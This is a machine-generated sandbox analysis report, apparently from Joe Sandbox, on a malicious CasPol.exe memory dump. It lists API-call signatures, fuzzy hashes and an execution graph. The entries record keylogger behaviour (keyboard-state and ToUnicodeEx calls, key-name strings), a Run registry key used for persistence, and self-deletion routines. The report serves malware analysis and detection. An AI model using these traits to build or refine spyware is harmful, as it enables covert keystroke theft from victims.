                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LocaleValid
                                                                                                                                                              • String ID: IsValidLocaleName$j=D
                                                                                                                                                              • API String ID: 1901932003-3128777819
                                                                                                                                                              • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                                              • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                                                                                                              • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                                              • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                              • String ID: T=G$T=G
                                                                                                                                                              • API String ID: 3519838083-3732185208
                                                                                                                                                              • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                                                                              • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                                                                                                                              • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                                                                              • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                                                                                                                              APIs
                                                                                                                                                              • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                                                                                • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                                                                                                • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                                                                • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                                                                • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                                                                • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                                                                                                • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047414C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                                                                • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                              • String ID: [AltL]$[AltR]
                                                                                                                                                              • API String ID: 2738857842-2658077756
                                                                                                                                                              • Opcode ID: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                                                                                              • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                                                                                              • Opcode Fuzzy Hash: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                                                                                              • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                                                                                              APIs
                                                                                                                                                              • _free.LIBCMT ref: 00448825
                                                                                                                                                                • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFreeHeapLast_free
                                                                                                                                                              • String ID: `@$`@
                                                                                                                                                              • API String ID: 1353095263-20545824
                                                                                                                                                              • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                                                              • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                                                                                                              • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                                                              • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                                                                                                              APIs
                                                                                                                                                              • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: State
                                                                                                                                                              • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                              • API String ID: 1649606143-2446555240
                                                                                                                                                              • Opcode ID: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                                                                                              • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                                                                              • Opcode Fuzzy Hash: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                                                                                              • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,PFb,004742F8,?,pth_unenc), ref: 00412988
                                                                                                                                                              • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                                                                                              Strings
                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DeleteOpenValue
                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                              • API String ID: 2654517830-1051519024
                                                                                                                                                              • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                                              • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                                                                              • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                                              • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                                                                              APIs
                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                                                                                              • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DeleteDirectoryFileRemove
                                                                                                                                                              • String ID: pth_unenc
                                                                                                                                                              • API String ID: 3325800564-4028850238
                                                                                                                                                              • Opcode ID: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                                                                                              • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                                                                                              • Opcode Fuzzy Hash: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                                                                                              • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                                                                                              APIs
                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                                              • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ObjectProcessSingleTerminateWait
                                                                                                                                                              • String ID: pth_unenc
                                                                                                                                                              • API String ID: 1872346434-4028850238
                                                                                                                                                              • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                                                              • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                                                                                              • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                                                              • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CommandLine
                                                                                                                                                              • String ID: 87b
                                                                                                                                                              • API String ID: 3253501508-3867331962
                                                                                                                                                              • Opcode ID: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                                                                                                                                                              • Instruction ID: 13d69598d350970c9b91df73096b24a53109b9b907d0ea4b726438dfa3130670
                                                                                                                                                              • Opcode Fuzzy Hash: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                                                                                                                                                              • Instruction Fuzzy Hash: 09B0027D8157009FC7419F79BD5D1443BA0B75861339094B5DC19C7B35DA358085EF18
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CommandLine
                                                                                                                                                              • String ID: 87b
                                                                                                                                                              • API String ID: 3253501508-3867331962
                                                                                                                                                              • Opcode ID: f03b9bd105845c934ec86b57f4a2021404f8ac89823aaf0d7c22f7e26958660e
                                                                                                                                                              • Instruction ID: 64725d3052c2c9ae7bbd7e52e8b3a5750bb25634a918b02f39acb7dc5bcd530d
                                                                                                                                                              • Opcode Fuzzy Hash: f03b9bd105845c934ec86b57f4a2021404f8ac89823aaf0d7c22f7e26958660e
                                                                                                                                                              • Instruction Fuzzy Hash: C0B00278C012209FE744AF7499DC2487FB0B758752B90D8AFD51AD2764D635C047EF20
                                                                                                                                                              APIs
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0043FB02
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1717984340-0
                                                                                                                                                              • Opcode ID: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                                                                                              • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                                                                                                              • Opcode Fuzzy Hash: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                                                                                              • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:6.3%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                              Signature Coverage:0.8%
                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                              Total number of Limit Nodes:67
                                                                                                                                                              execution_graph 40516 441819 40519 430737 40516->40519 40518 441825 40520 430756 40519->40520 40521 43076d 40519->40521 40522 430774 40520->40522 40523 43075f 40520->40523 40521->40518 40525 43034a memcpy 40522->40525 40540 4169a7 11 API calls 40523->40540 40528 43077e 40525->40528 40526 4307ce 40527 430819 memset 40526->40527 40533 415b2c 40526->40533 40527->40521 40528->40521 40528->40526 40531 4307fa 40528->40531 40530 4307e9 40530->40521 40530->40527 40541 4169a7 11 API calls 40531->40541 40534 415b42 40533->40534 40536 415b46 40533->40536 40535 415b94 40534->40535 40534->40536 40538 415b5a 40534->40538 40537 4438b5 10 API calls 40535->40537 40536->40530 40537->40536 40538->40536 40539 415b79 memcpy 40538->40539 40539->40536 40540->40521 40541->40521 37539 442ec6 19 API calls 37713 4152c6 malloc 37714 4152e2 37713->37714 37715 4152ef 37713->37715 37717 416760 11 API calls 37715->37717 37717->37714 38294 4466f4 38313 446904 38294->38313 38296 446700 GetModuleHandleA 38299 446710 __set_app_type __p__fmode __p__commode 38296->38299 38298 4467a4 38300 4467ac __setusermatherr 38298->38300 38301 4467b8 38298->38301 38299->38298 38300->38301 38314 4468f0 _controlfp 38301->38314 38303 4467bd _initterm __wgetmainargs _initterm 38304 446810 38303->38304 38305 44681e GetStartupInfoW 38303->38305 38307 446866 GetModuleHandleA 38305->38307 38315 41276d 38307->38315 38311 446896 exit 38312 44689d _cexit 38311->38312 38312->38304 38313->38296 38314->38303 38316 41277d 38315->38316 38358 4044a4 LoadLibraryW 38316->38358 38318 412785 38319 412789 38318->38319 38366 414b81 38318->38366 38319->38311 38319->38312 38322 4127c8 38372 412465 memset ??2@YAPAXI 38322->38372 38324 4127ea 38384 40ac21 38324->38384 38329 412813 38402 40dd07 memset 38329->38402 38330 412827 38407 40db69 memset 38330->38407 38333 412822 38428 4125b6 ??3@YAXPAX 38333->38428 38335 40ada2 _wcsicmp 38336 41283d 38335->38336 38336->38333 38339 412863 CoInitialize 38336->38339 38412 41268e 38336->38412 38432 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38339->38432 38341 41296f 38434 40b633 38341->38434 38346 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38350 412957 CoUninitialize 38346->38350 38355 4128ca 38346->38355 38350->38333 38351 4128d0 TranslateAcceleratorW 38352 412941 GetMessageW 38351->38352 38351->38355 38352->38350 38352->38351 38353 412909 IsDialogMessageW 38353->38352 38353->38355 38354 4128fd IsDialogMessageW 38354->38352 38354->38353 38355->38351 38355->38353 38355->38354 38356 41292b TranslateMessage DispatchMessageW 38355->38356 38357 41291f IsDialogMessageW 38355->38357 38356->38352 38357->38352 38357->38356 38359 4044f7 38358->38359 38360 4044cf GetProcAddress 38358->38360 38364 404507 MessageBoxW 38359->38364 38365 40451e 38359->38365 38361 4044e8 FreeLibrary 38360->38361 38362 4044df 38360->38362 38361->38359 38363 4044f3 38361->38363 38362->38361 38363->38359 38364->38318 38365->38318 38367 414b8a 38366->38367 38368 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38366->38368 38438 40a804 memset 38367->38438 38368->38322 38371 414b9e GetProcAddress 38371->38368 38373 4124e0 38372->38373 38374 412505 ??2@YAPAXI 38373->38374 38375 41251c 38374->38375 38377 412521 38374->38377 38460 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38375->38460 38449 444722 38377->38449 38383 41259b wcscpy 38383->38324 38465 40b1ab free free 38384->38465 38386 40ac5c 38389 40a9ce malloc memcpy free free 38386->38389 38390 40ad4b 38386->38390 38392 40ace7 free 38386->38392 38397 40ad76 38386->38397 38469 40a8d0 38386->38469 38481 4099f4 38386->38481 38389->38386 38390->38397 38489 40a9ce 38390->38489 38392->38386 38396 40a8d0 7 API calls 38396->38397 38466 40aa04 38397->38466 38398 40ada2 38399 40adc9 38398->38399 38401 40adaa 38398->38401 38399->38329 38399->38330 38400 40adb3 _wcsicmp 38400->38399 38400->38401 38401->38399 38401->38400 38494 40dce0 38402->38494 38404 40dd3a GetModuleHandleW 38499 40dba7 38404->38499 38408 40dce0 3 API calls 38407->38408 38409 40db99 38408->38409 38571 40dae1 38409->38571 38585 402f3a 38412->38585 38414 412766 38414->38333 38414->38339 38415 4126d3 _wcsicmp 38416 4126a8 38415->38416 38416->38414 38416->38415 38418 41270a 38416->38418 38619 4125f8 7 API calls 38416->38619 38418->38414 38588 411ac5 38418->38588 38429 4125da 38428->38429 38430 4125f0 38429->38430 38431 4125e6 DeleteObject 38429->38431 38433 40b1ab free free 38430->38433 38431->38430 38432->38346 38433->38341 38435 40b640 38434->38435 38436 40b639 free 38434->38436 38437 40b1ab free free 38435->38437 38436->38435 38437->38319 38439 40a83b GetSystemDirectoryW 38438->38439 38440 40a84c wcscpy 38438->38440 38439->38440 38445 409719 wcslen 38440->38445 38443 40a881 LoadLibraryW 38444 40a886 38443->38444 38444->38368 38444->38371 38446 409724 38445->38446 38447 409739 wcscat LoadLibraryW 38445->38447 38446->38447 38448 40972c wcscat 38446->38448 38447->38443 38447->38444 38448->38447 38450 444732 38449->38450 38451 444728 DeleteObject 38449->38451 38461 409cc3 38450->38461 38451->38450 38453 412551 38454 4010f9 38453->38454 38455 401130 38454->38455 38456 401134 GetModuleHandleW LoadIconW 38455->38456 38457 401107 wcsncat 38455->38457 38458 40a7be 38456->38458 38457->38455 38459 40a7d2 38458->38459 38459->38383 38459->38459 38460->38377 38464 409bfd memset wcscpy 38461->38464 38463 409cdb CreateFontIndirectW 38463->38453 38464->38463 38465->38386 38467 40aa14 38466->38467 38468 40aa0a free 38466->38468 38467->38398 38468->38467 38470 40a8eb 38469->38470 38471 40a8df wcslen 38469->38471 38472 40a906 free 38470->38472 38473 40a90f 38470->38473 38471->38470 38474 40a919 38472->38474 38475 4099f4 3 API calls 38473->38475 38476 40a932 38474->38476 38477 40a929 free 38474->38477 38475->38474 38478 4099f4 3 API calls 38476->38478 38479 40a93e memcpy 38477->38479 38480 40a93d 38478->38480 38479->38386 38480->38479 38482 409a41 38481->38482 38483 4099fb malloc 38481->38483 38482->38386 38485 409a37 38483->38485 38486 409a1c 38483->38486 38485->38386 38487 409a30 free 38486->38487 38488 409a20 memcpy 38486->38488 38487->38485 38488->38487 38490 40a9e7 38489->38490 38491 40a9dc free 38489->38491 38493 4099f4 3 API calls 38490->38493 38492 40a9f2 38491->38492 38492->38396 38493->38492 38518 409bca GetModuleFileNameW 38494->38518 38496 40dce6 wcsrchr 38497 40dcf5 38496->38497 38498 40dcf9 wcscat 38496->38498 38497->38498 38498->38404 38519 44db70 38499->38519 38503 40dbfd 38522 4447d9 38503->38522 38506 40dc34 wcscpy wcscpy 38548 40d6f5 38506->38548 38507 40dc1f wcscpy 38507->38506 38510 40d6f5 3 API calls 38511 40dc73 38510->38511 38512 40d6f5 3 API calls 38511->38512 38513 40dc89 38512->38513 38514 40d6f5 3 API calls 38513->38514 38515 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38514->38515 38554 40da80 38515->38554 38518->38496 38520 40dbb4 memset memset 38519->38520 38521 409bca GetModuleFileNameW 38520->38521 38521->38503 38524 4447f4 38522->38524 38523 40dc1b 38523->38506 38523->38507 38524->38523 38525 444807 ??2@YAPAXI 38524->38525 38526 44481f 38525->38526 38527 444873 _snwprintf 38526->38527 38528 4448ab wcscpy 38526->38528 38561 44474a 8 API calls 38527->38561 38530 4448bb 38528->38530 38562 44474a 8 API calls 38530->38562 38532 4448a7 38532->38528 38532->38530 38533 4448cd 38563 44474a 8 API calls 38533->38563 38535 4448e2 38564 44474a 8 API calls 38535->38564 38537 4448f7 38565 44474a 8 API calls 38537->38565 38539 44490c 38566 44474a 8 API calls 38539->38566 38541 444921 38567 44474a 8 API calls 38541->38567 38543 444936 38568 44474a 8 API calls 38543->38568 38545 44494b 38569 44474a 8 API calls 38545->38569 38547 444960 ??3@YAXPAX 38547->38523 38549 44db70 38548->38549 38550 40d702 memset GetPrivateProfileStringW 38549->38550 38551 40d752 38550->38551 38552 40d75c WritePrivateProfileStringW 38550->38552 38551->38552 38553 40d758 38551->38553 38552->38553 38553->38510 38555 44db70 38554->38555 38556 40da8d memset 38555->38556 38557 40daac LoadStringW 38556->38557 38558 40dac6 38557->38558 38558->38557 38560 40dade 38558->38560 38570 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38558->38570 38560->38333 38561->38532 38562->38533 38563->38535 38564->38537 38565->38539 38566->38541 38567->38543 38568->38545 38569->38547 38570->38558 38581 409b98 GetFileAttributesW 38571->38581 38573 40daea 38574 40db63 38573->38574 38575 40daef wcscpy wcscpy GetPrivateProfileIntW 38573->38575 38574->38335 38582 40d65d GetPrivateProfileStringW 38575->38582 38577 40db3e 38583 40d65d GetPrivateProfileStringW 38577->38583 38579 40db4f 38584 40d65d GetPrivateProfileStringW 38579->38584 38581->38573 38582->38577 38583->38579 38584->38574 38620 40eaff 38585->38620 38589 411ae2 memset 38588->38589 38590 411b8f 38588->38590 38660 409bca GetModuleFileNameW 38589->38660 38602 411a8b 38590->38602 38592 411b0a wcsrchr 38593 411b22 wcscat 38592->38593 38594 411b1f 38592->38594 38661 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38593->38661 38594->38593 38596 411b67 38662 402afb 38596->38662 38600 411b7f 38718 40ea13 SendMessageW memset SendMessageW 38600->38718 38603 402afb 27 API calls 38602->38603 38604 411ac0 38603->38604 38605 4110dc 38604->38605 38606 41113e 38605->38606 38611 4110f0 38605->38611 38743 40969c LoadCursorW SetCursor 38606->38743 38608 411143 38744 4032b4 38608->38744 38762 444a54 38608->38762 38609 4110f7 _wcsicmp 38609->38611 38610 411157 38612 40ada2 _wcsicmp 38610->38612 38611->38606 38611->38609 38765 410c46 10 API calls 38611->38765 38615 411167 38612->38615 38613 4111af 38615->38613 38616 4111a6 qsort 38615->38616 38616->38613 38619->38416 38621 40eb10 38620->38621 38633 40e8e0 38621->38633 38624 40eb6c memcpy memcpy 38628 40ebb7 38624->38628 38625 40ebf2 ??2@YAPAXI ??2@YAPAXI 38627 40ec2e ??2@YAPAXI 38625->38627 38630 40ec65 38625->38630 38626 40d134 16 API calls 38626->38628 38627->38630 38628->38624 38628->38625 38628->38626 38630->38630 38643 40ea7f 38630->38643 38632 402f49 38632->38416 38634 40e8f2 38633->38634 38635 40e8eb ??3@YAXPAX 38633->38635 38636 40e900 38634->38636 38637 40e8f9 ??3@YAXPAX 38634->38637 38635->38634 38638 40e911 38636->38638 38639 40e90a ??3@YAXPAX 38636->38639 38637->38636 38640 40e931 ??2@YAPAXI ??2@YAPAXI 38638->38640 38641 40e921 ??3@YAXPAX 38638->38641 38642 40e92a ??3@YAXPAX 38638->38642 38639->38638 38640->38624 38641->38642 38642->38640 38644 40aa04 free 38643->38644 38645 40ea88 38644->38645 38646 40aa04 free 38645->38646 38647 40ea90 38646->38647 38648 40aa04 free 38647->38648 38649 40ea98 38648->38649 38650 40aa04 free 38649->38650 38651 40eaa0 38650->38651 38652 40a9ce 4 API calls 38651->38652 38653 40eab3 38652->38653 38654 40a9ce 4 API calls 38653->38654 38655 40eabd 38654->38655 38656 40a9ce 4 API calls 38655->38656 38657 40eac7 38656->38657 38658 40a9ce 4 API calls 38657->38658 38659 40ead1 38658->38659 38659->38632 38660->38592 38661->38596 38719 40b2cc 38662->38719 38664 402b0a 38665 40b2cc 27 API calls 38664->38665 38666 402b23 38665->38666 38667 40b2cc 27 API calls 38666->38667 38668 402b3a 38667->38668 38669 40b2cc 27 API calls 38668->38669 38670 402b54 38669->38670 38671 40b2cc 27 API calls 38670->38671 38672 402b6b 38671->38672 38673 40b2cc 27 API calls 38672->38673 38674 402b82 38673->38674 38675 40b2cc 27 API calls 38674->38675 38676 402b99 38675->38676 38677 40b2cc 27 API calls 38676->38677 38678 402bb0 38677->38678 38679 40b2cc 27 API calls 38678->38679 38680 402bc7 38679->38680 38681 40b2cc 27 API calls 38680->38681 38682 402bde 38681->38682 38683 40b2cc 27 API calls 38682->38683 38684 402bf5 38683->38684 38685 40b2cc 27 API calls 38684->38685 38686 402c0c 38685->38686 38687 40b2cc 27 API calls 38686->38687 38688 402c23 38687->38688 38689 40b2cc 27 API calls 38688->38689 38690 402c3a 38689->38690 38691 40b2cc 27 API calls 38690->38691 38692 402c51 38691->38692 38693 40b2cc 27 API calls 38692->38693 38694 402c68 38693->38694 38695 40b2cc 27 API 